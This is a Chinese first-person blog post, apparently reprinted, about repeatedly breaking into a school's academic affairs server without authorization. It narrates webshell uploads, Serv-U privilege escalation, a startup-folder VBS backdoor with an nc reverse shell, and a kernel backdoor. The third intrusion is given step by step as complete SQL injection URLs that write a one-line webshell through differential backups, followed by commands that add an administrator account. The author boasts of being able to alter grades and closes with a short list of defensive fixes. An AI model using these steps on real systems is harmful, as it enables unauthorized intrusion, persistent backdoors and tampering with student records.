已经不记得是第几次进入学校教务处啦,反正每次都有不同的理由。好笑的是每次管理员只是发现入侵者,简单的做了下防护,而没有注意到其它安全的问题。所以就有了我X次入侵的过程。最重要的是觉得如果是黑客/安全技术爱好者的话,学校的网站是一定要拿下的,我已经拿下了学校的主网站和教务处网站,而这两个网站都是我们学校网站重中之重的网站,而且学校教务处网站有我们全校学生的成绩数据库,平时我们查成绩的时候就要用到这个网站。
在我的印象中比较深刻的有三次进入到教务处网站。第一次是刚到学校读书的时候,老师老是叫我们到教务处找考试的消息。我就注意到教务处网站的重要性啦。当时还是sql注入和上传最流行的时候。当然我们学校网站也不例外啊。教务处网站用的是windows 2000 server系统。浏览下教务处网站觉得做的还不错的啊,扫了下开放的端口和检查下sql注入,竟然没有找到任何的漏洞(当时还是静态网站)。我不相信没有漏洞,也怀疑是不是学校有高人存在的原因。拿出啊D的注入工具找上传的网页,当出现有http://xxx.xxx.xxx.xxx/bbs/upfile1.asp的时候,我心里一阵狂喜。打开后才知道dvbbs6.0论坛上传网页。原来管理员把上传页面改了。呵呵,对不起啦,找到压箱宝底桂林老兵的上传利用程序上传asp木马,拿到了webshell。扫了下21端口,网站用的还是serv-u4.0版本,最后上传su.exe溢出拿到了网站的绝对权限。网站还开了3389也省了我开终端端口,克隆了guest帐号,读出管理员的密码,清理脚印走人。当时也是得意的很啊。我想管理员不会轻易发现我的存在了吧。过了很长一段时间,用克隆的帐号进入主机的时候,发现我再也进不去啦。管理员的密码也进不去,当时也很生气学校要我们交这个方面的钱,那个方面的钱。不得不让我再次下定决心入侵教务处,也就有了我的第二次。这次学校网站也改为动态的网站啦,用的是asp的程序。我想管理员发现了入侵者不一定在web程序上下功夫。打开留下的asp木马果然还在。当我再次拿出su.exe程序溢出时发现怎么也登陆不上主机。扫了下端口。晕的是管理员竟然把serv-u卸载啦。su溢出取得权限已经行不通啦。在主机上找有没有什么可以利用的漏洞。可恶的是管理员没有留下可以直接取得权限的东西。留下的asp木马可以浏览任意盘,看来也只有走这条路啦。思路是写个死循环,放个vbs到启动项目去。当主机启动时也就启动了我留下的后门。我的vbs放在c:\Documents and Settings\Administrator\「开始」菜单\程序\启动\shell.vbs下。利用瑞士军刀nc反向连接返回一个cmdshell,运行死循环的批处理。此时的cmdshell是guest权限,而guest权限下的确是有能力让主机重起的。(guest权限下重起代码已经打包给大家了)这个时候就只有等待咯。当黑客也是要有耐心的。呵呵,果然过了几天的时间网站打不开了,我想管理员应该去重新启动下主机了吧,后来也理所当然的再次拿到了主机的绝对权限。也再次克隆了guest帐号和管理员的密码。 快要毕业了,学生一切的行动都要按照教务处的去做。呵呵我有网站的绝对权限我怕什么(后来学校把成绩这一块也放到了教务处)。我想怎么改成绩就怎么改。某一天,当我再次得意的用guest帐号和管理员密码进入主机的时候,它对我说"NO"。哦,当时我快疯掉啦,快要毕业了这么紧要的关头我再次与教务处网站说"BYEBYE"。我在想不知道是那个名人说过"如果连自己学校的网站都搞不定,他不适合当黑客"。这句话对我的印象很深刻。也就有了我最进的第三次比较深刻的入侵,也就是本文要讲的核心内容。(前二次是"过去式",没有给大家抓图,对不起各位看官啦:))后来教务处有了很大的变化,我的asp木马终于被管理员发现了。webshell也就没有啦。dvbbs论坛也被删掉了。看来走上传拿到webshell行不通。网站不是用的asp的程序吗,看有没有sql注入漏洞。经过检查典型的sql注入漏洞。拿出大名鼎鼎的nbsi扫下,原来是DB_OWNER的权限(图一)。 哦,现在教务处用的是asp+mssql黄金组合。利用sqlhello.exe远程溢出程序,怎么也返回不了主机的cmdshell,看来溢出这条路也行不通啦。好的,整理下思路,首先是利用备份差异拿到webshell。当然要知道网站的数据库是不是放在同一个网站上呐,用nbsi的列目录功能,幸运的是数据库和web是同一个主机上的。(图二) 好的,紧张的时刻到了,差异备份得到webshell。第一步:http://xxx.xxx.xxx.xxx/News_template.asp?id=395;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x6A776368627565 backup database @a to disk=@s--备份当前数据库,以差异备份.(其中0x6A776368627565是我的当前数据库jwchbue)第二步:http://xxx.xxx.xxx.xxx/News_template.asp?id=395;Drop table [huanle];create table [dbo].[huanle] ([cmd] [image])-- 建表加字段。第三步:http://xxx.xxx.xxx.xxx/News_template.asp?id=395;insert into huanle(cmd) values(0x3C2565786563757465207265717565737428224E6565616F2229253E)-- 写入蓝屏大叔一句话木马。第四步http://xxx.xxx.xxx.xxx/News_template.asp?id=395;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C6A77635C7368656C6C2E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--。(0x643A5C6A77635C7368656C6C2E617370是备份得到webshell路径d:\jwc\shell.asp)。再次以差异备份得到插入有蓝屏大叔一句话木马的WEBSHELL 。备份得到webshell路径是http://xxx.xxx.xxx.xxx/shell.asp。第五步:http://xxx.xxx.xxx.xxx/News_template.asp?id=395;Drop table [huanle]-- 删除建立的表。小心使得万年船:)。打开备份得到的网页。http://xxx.xxx.xxx.xxx/shell.asp.出现了错误。(图三) 说明你已经成功啦。利用蓝屏客户端连接,添上你的asp木马。(图四) 提交后出现了令人激动的asp木马。(图五)。 小样看你能飞出我的五指山!!呵呵!!!扫描下是否开放了ftp端口。幸运的是管理员仍然用的是serv-u4.0版本的。(图六) 看来取得权限只是时间上的问题啦。利用刚刚得到的asp木马上传一个超级大马桂林老兵的asp站长助手。(图七) 仍然可以浏览任意盘,并且可以利用cmd.exe .上传serv-u的本地溢出程序,net user test test /add,net localgroup administrators test /add(图八)。 就这样第X次拿到学校教务处的绝对权限。因为开了3389所以不费力气去开终端,(图九) 这次不会让“肉鸡”跑了。不仅克隆了guest帐号和再次读出了管理员的密码还放了内核级的后门程序,最后当然是清理脚印。我想管理员没有想到这么快会有入侵者再次“光临”吧。 sql注入、上传型漏洞、serv-u提升权限已经流行了很长一段时间啦,说明教务处网站管理员不是很注意网络的安全。从小小的一个sql注入漏洞竟然可以拿到系统的administrator权限是多么恐怖的一件事情。可以看出安全是一个整体。毕竟是自己学校的网站也不好意思去破坏。(本人可是个好人哦)还是帮学校做下安全吧。系统已经打上了sp4和最新的补丁,管理员只是注重系统的安全,也可以说管理员很懒惰。问题的原因还是web程序上出现了漏洞,补上sql防注入的程序,serv-u下个最新的版本,并严格控制权限。mssql也打上了最新的补丁,并且严格控制任意盘的权限,重中之重是控制好c:\program file\serv-u、启动项目、等一些重要的目录的权限。web程序也给出专门的管理人员权限,我想基本上算是安全了吧。本文没有什么技术含量,用到的都是一些常用的入侵方法。比如guest权限下重起主机,这也是提升权限的一个方法。只是想告诉大家入侵并不是一成不变的,如果在入侵中多动下脑收获会更多。文章写作匆忙,难免会有纰漏,还望指正。
1.凡本网注明来源为“每日生活网”的所有作品,包括文字与图片,请注明转载来源出自本站。未注明者视侵权,本网将依法追究法律责任。
2.凡注明"来源:xxx(网络、转载)"的作品,均转载自其它媒体,本网转载的目的在于传播更多信息,此类稿件并不代表本网观点,本网不承担此类稿件侵权行为的直接责任及连带责任。
3. 如因作品内容、版权等需要同本网联系的,请在作品在本网发表之日起30日内联系,否则视为放弃相关权利。
4.网站转载信息(包括资讯、打折等)如与事实有出入请与本站联系,我们将第一时间更正。如造成损失本站不承担任何责任。
